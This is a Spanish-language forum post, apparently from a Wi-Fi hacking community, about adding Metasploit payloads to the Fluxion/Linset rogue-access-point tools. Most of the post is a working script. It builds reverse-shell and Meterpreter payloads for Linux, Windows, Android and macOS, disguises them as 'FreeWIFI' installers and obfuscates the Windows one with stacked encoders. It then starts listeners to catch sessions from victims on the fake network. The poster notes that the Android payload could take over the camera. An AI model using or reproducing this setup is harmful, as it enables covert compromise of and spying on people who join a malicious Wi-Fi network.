saludos
hablando de playload he visto por ahi un intento de meterselo a fluxion o linset como lo queramos llamar :lol::lol:
pero claro todo queda en intento son los 4 android ;windos,mac,linux
ahora el tema se puede lanzar un playload sin conexion de red solo la tuya creada por tu ap y el cliente la verdad me marca fallos pero como tengo poca memoria ram y siempre estoy en live como que me lo traba pa sacar foto y si puedes añadir algo de luz (en cuanto puedad haber si hago captura de imagen para que se vea bien)
[code]# Generate payload for sites
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=404 -f elf > $DUMP_PATH/FreeWIFI.elf &> $salida
msfvenom -p windows/shell_bind_tcp LHOST=192.168.1.1 LPORT=404 -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1|msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o $DUMP_PATH//FreeWIFI.exe &> $salida
msfvenom -p android/meterpreter/reverse_http LHOST=192.168.1.1 LPORT=404 R > $DUMP_PATH/FreeWIFI.apk &> $salida
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=404 -f macho > $DUMP_PATH/FreeWIFI.macho &> $salida
################################## < LINUX > ##################################
sudo rm -rf $DUMP_PATH/payloadLinux.rc
touch $DUMP_PATH/payloadLinux.rc
echo “use exploit/multi/handler” > $DUMP_PATH/payloadLinux.rc
echo “set PAYLOAD linux/x86/meterpreter/reverse_tcp” >> $DUMP_PATH/payloadLinux.rc
echo “set LHOST 192.168.1.1” >> $DUMP_PATH/payloadLinux.rc
echo “set LPORT 404” >> $DUMP_PATH/payloadLinux.rc
echo “set ExitOnSession false” >> $DUMP_PATH/payloadLinux.rc
echo “exploit -j” >> $DUMP_PATH/payloadLinux.rc
xterm $HOLD $BOTTOMRIGHT -bg “#000000” -fg “#FF0009” -title “Mfsconsole” -e msfconsole -r “$DUMP_PATH/payloadLinux.rc” &
################################## < WINDOWS > ##################################
sudo rm -rf $DUMP_PATH/payloadWindows.rc
touch $DUMP_PATH/payloadWindows.rc
echo “use exploit/multi/handler” > $DUMP_PATH/payloadWindows.rc
echo “set PAYLOAD windows/shell_bind_tcp” >> $DUMP_PATH/payloadWindows.rc
echo “set LHOST 192.168.1.1” >> $DUMP_PATH/payloadWindows.rc
echo “set LPORT 404” >> $DUMP_PATH/payloadWindows.rc
echo “set ExitOnSession false” >> $DUMP_PATH/payloadWindows.rc
echo “exploit -j” >> $DUMP_PATH/payloadWindows.rc
xterm $HOLD $TOPLEFT -bg “#000000” -fg “#FF0009” -title “Mfsconsole” -e msfconsole -r “$DUMP_PATH/payloadWindows.rc” &
################################## < MAC > ##################################
sudo rm -rf $DUMP_PATH/payloadMac.rc
touch $DUMP_PATH/payloadMac.rc
echo “use exploit/multi/handler” > $DUMP_PATH/payloadMac.rc
echo “set PAYLOAD osx/x86/shell_reverse_tcp” >> $DUMP_PATH/payloadMac.rc
echo “set LHOST 192.168.1.1” >> $DUMP_PATH/payloadMac.rc
echo “set LPORT 404” >> $DUMP_PATH/payloadMac.rc
echo “set ExitOnSession false” >> $DUMP_PATH/payloadMac.rc
echo “exploit -j” >> $DUMP_PATH/payloadMac.rc
xterm $HOLD $TOPRIGHT -bg “#000000” -fg “#FF0009” -title “Mfsconsole” -e msfconsole -r “$DUMP_PATH/payloadMac.rc” &
################################## < ANDROID > ##################################
sudo rm -rf $DUMP_PATH/payloadAndroid.rc
touch $DUMP_PATH/payloadAndroid.rc
echo “use exploit/multi/handler” > $DUMP_PATH/payloadAndroid.rc
echo “set PAYLOAD android/meterpreter/reverse_http” >> $DUMP_PATH/payloadAndroid.rc
echo “set LHOST 192.168.1.1” >> $DUMP_PATH/payloadAndroid.rc
echo “set LPORT 404” >> $DUMP_PATH/payloadAndroid.rc
echo “set ExitOnSession false” >> $DUMP_PATH/payloadAndroid.rc
echo “exploit -j” >> $DUMP_PATH/payloadAndroid.rc
xterm $HOLD $BOTTOMLEFT -bg “#000000” -fg “#FF0009” -title “Mfsconsole” -e msfconsole -r “$DUMP_PATH/payloadAndroid.rc” &
################################## < MAC > ##################################.[/code]
el playload de android es que en teoria le cojes todo camara …pero es un reverse http bien hasta ahi
¿pero lo dicho no se necesita conexion real de internet para inyectar un playload con metasploid y metepreter¿
lo dicho en cuento pueda dejo captura con fallos